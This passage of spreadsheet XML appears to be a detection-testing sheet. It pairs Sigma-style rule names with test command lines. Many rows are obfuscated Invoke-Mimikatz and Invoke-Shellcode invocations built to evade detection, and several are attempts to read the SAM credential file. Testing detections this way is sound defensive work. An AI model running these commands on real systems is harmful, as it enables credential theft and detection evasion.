          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E337" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H337" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I337" s="43" t="n"/>
      <c r="J337" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K337" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="338" ht="15.75" customHeight="1" s="42">
      <c r="A338" s="43" t="n"/>
      <c r="B338" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C338" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D338" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E338" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F338" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G338" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H338" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I338" s="43" t="n"/>
      <c r="J338" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K338" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="339" ht="15.75" customHeight="1" s="42">
      <c r="A339" s="43" t="n"/>
      <c r="B339" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C339" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D339" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E339" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F339" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G339" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H339" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I339" s="43" t="n"/>
      <c r="J339" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K339" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="340" ht="15.75" customHeight="1" s="42">
      <c r="A340" s="43" t="n"/>
      <c r="B340" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C340" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D340" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E340" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F340" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G340" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H340" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I340" s="43" t="n"/>
      <c r="J340" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K340" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="341" ht="15.75" customHeight="1" s="42">
      <c r="A341" s="43" t="n"/>
      <c r="B341" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C341" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D341" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E341" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F341" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G341" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H341" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I341" s="43" t="n"/>
      <c r="J341" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K341" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="342" ht="15.75" customHeight="1" s="42">
      <c r="A342" s="43" t="n"/>
      <c r="B342" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C342" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D342" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E342" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F342" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G342" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H342" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I342" s="43" t="n"/>
      <c r="J342" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K342" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="343" ht="15.75" customHeight="1" s="42">
      <c r="A343" s="43" t="n"/>
      <c r="B343" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C343" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D343" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E343" s="36" t="inlineStr">
        <is>
          <t>wmic useraccount list brief</t>
        </is>
      </c>
      <c r="F343" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G343" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H343" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I343" s="43" t="n"/>
      <c r="J343" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K343" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="344" ht="15.75" customHeight="1" s="42">
      <c r="A344" s="36" t="n"/>
      <c r="B344" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C344" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D344" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E344" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-ChildItem C:\Users\"</t>
        </is>
      </c>
      <c r="F344" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G344" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H344" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I344" s="36" t="n"/>
      <c r="J344" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K344" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="345" ht="15.75" customHeight="1" s="42">
      <c r="A345" s="43" t="n"/>
      <c r="B345" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C345" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D345" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E345" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F345" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G345" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H345" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I345" s="43" t="n"/>
      <c r="J345" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K345" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="346" ht="15.75" customHeight="1" s="42">
      <c r="A346" s="43" t="n"/>
      <c r="B346" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C346" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D346" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E346" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-CimInstance -ClassName Win32_UserAccount"</t>
        </is>
      </c>
      <c r="F346" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G346" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H346" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I346" s="36" t="n"/>
      <c r="J346" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K346" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="347" ht="15.75" customHeight="1" s="42">
      <c r="A347" s="43" t="n"/>
      <c r="B347" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C347" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D347" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E347" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-LocalUser"</t>
        </is>
      </c>
      <c r="F347" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G347" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H347" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I347" s="43" t="n"/>
      <c r="J347" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K347" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="348" ht="15.75" customHeight="1" s="42">
      <c r="A348" s="43" t="n"/>
      <c r="B348" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C348" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D348" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E348" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /c "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F348" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G348" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H348" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I348" s="43" t="n"/>
      <c r="J348" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K348" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="349" ht="15.75" customHeight="1" s="42">
      <c r="A349" s="43" t="n"/>
      <c r="B349" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C349" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D349" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E349" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" -"c" "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F349" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G349" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H349" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I349" s="43" t="n"/>
      <c r="J349" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K349" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="350" ht="15.75" customHeight="1" s="42">
      <c r="A350" s="43" t="n"/>
      <c r="B350" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C350" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D350" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E350" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /"c" "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F350" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G350" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H350" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I350" s="43" t="n"/>
      <c r="J350" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K350" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="351" ht="15.75" customHeight="1" s="42">
      <c r="A351" s="43" t="n"/>
      <c r="B351" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_local_system_owner_account_discovery</t>
        </is>
      </c>
      <c r="C351" s="36" t="inlineStr">
        <is>
          <t>Local Accounts Discovery</t>
        </is>
      </c>
      <c r="D351" s="36" t="inlineStr">
        <is>
          <t>502b42de-4306-40b4-9596-6f590c81f073</t>
        </is>
      </c>
      <c r="E351" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /C "type C:\Windows\System32\config\SAM"</t>
        </is>
      </c>
      <c r="F351" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G351" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H351" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I351" s="43" t="n"/>
      <c r="J351" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K351" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="352" ht="15.75" customHeight="1" s="42">
      <c r="A352" s="43" t="n"/>
      <c r="B352" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C352" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D352" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E352" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /c "powershell -NoProfile -WindowStyle Hidden -Command \"&amp;{Start-Process -FilePath 'C:\Windows\Sysinternals\psloglist64.exe' -ArgumentList '-x', 'application'}\""</t>
        </is>
      </c>
      <c r="F352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H352" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I352" s="36" t="n"/>
      <c r="J352" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K352" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="353" ht="15.75" customHeight="1" s="42">
      <c r="A353" s="43" t="n"/>
      <c r="B353" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C353" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D353" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E353" s="36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F353" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G353" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H353" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I353" s="36" t="n"/>
      <c r="J353" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K353" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="354" ht="15.75" customHeight="1" s="42">
      <c r="A354" s="43" t="n"/>
      <c r="B354" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C354" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D354" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E354" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /c "powershell -NoPrOfiLe -WiNDowstYLE Hidden -c \" &amp;{Start-Process /"FilePath" 'C:\Windows\Sysinternals\psloglist64.exe' -ArgumentList '-X' , 'application' }\""</t>
        </is>
      </c>
      <c r="F354" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G354" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H354" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I354" s="36" t="n"/>
      <c r="J354" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K354" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="355" ht="15.75" customHeight="1" s="42">
      <c r="A355" s="43" t="n"/>
      <c r="B355" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C355" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D355" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E355" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /"c" "powershell -nOpROfilE -WindOWStYLe Hidden -c \" &amp;{Start-Process -FilePath 'C:\Windows\Sysinternals\psloglist64.exe' /"ArgumentList" "-x'" , 'application' }\""</t>
        </is>
      </c>
      <c r="F355" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G355" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H355" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I355" s="43" t="n"/>
      <c r="J355" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K355" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="356" ht="15.75" customHeight="1" s="42">
      <c r="A356" s="43" t="n"/>
      <c r="B356" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C356" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D356" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E356" s="36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F356" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G356" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H356" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I356" s="36" t="n"/>
      <c r="J356" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K356" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="357" ht="15.75" customHeight="1" s="42">
      <c r="A357" s="43" t="n"/>
      <c r="B357" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C357" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D357" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E357" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" /C "powershell -nop -"WindowStyle" Hidden -commAnD \" &amp;{Start-Process -FilePath 'C:\Windows\Sysinternals\psloglist64.exe' -ArguMenTlIst "-x'" , 'application' }\""</t>
        </is>
      </c>
      <c r="F357" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G357" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H357" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I357" s="36" t="n"/>
      <c r="J357" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K357" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="358" ht="15.75" customHeight="1" s="42">
      <c r="A358" s="43" t="n"/>
      <c r="B358" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_psloglist</t>
        </is>
      </c>
      <c r="C358" s="36" t="inlineStr">
        <is>
          <t>Suspicious Use of PsLogList</t>
        </is>
      </c>
      <c r="D358" s="36" t="inlineStr">
        <is>
          <t>aae1243f-d8af-40d8-ab20-33fc6d0c55bc</t>
        </is>
      </c>
      <c r="E358" s="36" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\cmd.exe" -"c" "powershell -nop -wINDoWsTYle Hidden -"Command" \" &amp;{Start-Process -"FilePath" 'C:\Windows\Sysinternals\psloglist64.exe' /"ArgumentList" "-x'" , 'application' }\""</t>
        </is>
      </c>
      <c r="F358" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G358" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H358" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I358" s="43" t="n"/>
      <c r="J358" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K358" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="359" ht="15.75" customHeight="1" s="42">
      <c r="A359" s="43" t="n"/>
      <c r="B359" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C359" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D359" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E359" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F359" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G359" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H359" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I359" s="43" t="n"/>
      <c r="J359" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K359" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="360" ht="15.75" customHeight="1" s="42">
      <c r="A360" s="43" t="n"/>
      <c r="B360" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_net_groups_and_accounts_recon</t>
        </is>
      </c>
      <c r="C360" s="36" t="inlineStr">
        <is>
          <t>Suspicious Group And Account Reconnaissance Activity Using Net.EXE</t>
        </is>
      </c>
      <c r="D360" s="36" t="inlineStr">
        <is>
          <t>d95de845-b83c-4a9a-8a6a-4fc802ebf6c0</t>
        </is>
      </c>
      <c r="E360" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "Get-LocalGroupMember -Group 'Administrators'"</t>
        </is>
      </c>
      <c r="F360" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G360" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H360" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I360" s="43" t="n"/>
      <c r="J360" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K360" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="361" ht="15.75" customHeight="1" s="42">
      <c r="A361" s="43" t="n"/>
      <c r="B361" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C361" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D361" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E361" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F361" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G361" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H361" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I361" s="36" t="n"/>
      <c r="J361" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K361" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="362" ht="15.75" customHeight="1" s="42">
      <c r="A362" s="43" t="n"/>
      <c r="B362" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C362" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D362" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E362" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"c" "iex ('Invoke-' + 'Shell' + 'code')"</t>
        </is>
      </c>
      <c r="F362" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G362" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H362" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I362" s="36" t="n"/>
      <c r="J362" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K362" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="363" ht="15.75" customHeight="1" s="42">
      <c r="A363" s="43" t="n"/>
      <c r="B363" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C363" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D363" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E363" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F363" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G363" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H363" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I363" s="36" t="n"/>
      <c r="J363" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K363" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="364" ht="15.75" customHeight="1" s="42">
      <c r="A364" s="43" t="n"/>
      <c r="B364" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C364" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D364" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E364" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -cOMMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F364" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G364" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H364" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I364" s="43" t="n"/>
      <c r="J364" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K364" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="365" ht="15.75" customHeight="1" s="42">
      <c r="A365" s="43" t="n"/>
      <c r="B365" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C365" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D365" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E365" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"Command" "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F365" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G365" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H365" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I365" s="36" t="n"/>
      <c r="J365" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K365" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="366" ht="15.75" customHeight="1" s="42">
      <c r="A366" s="43" t="n"/>
      <c r="B366" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C366" s="36" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D366" s="36" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E366" s="36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366" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G366" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H366" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I366" s="36" t="n"/>
      <c r="J366" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K366" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="367" ht="15.75" customHeight="1" s="42">
      <c r="A367" s="43" t="n"/>
      <c r="B367" s="36" t="inlineStr">
        <is>
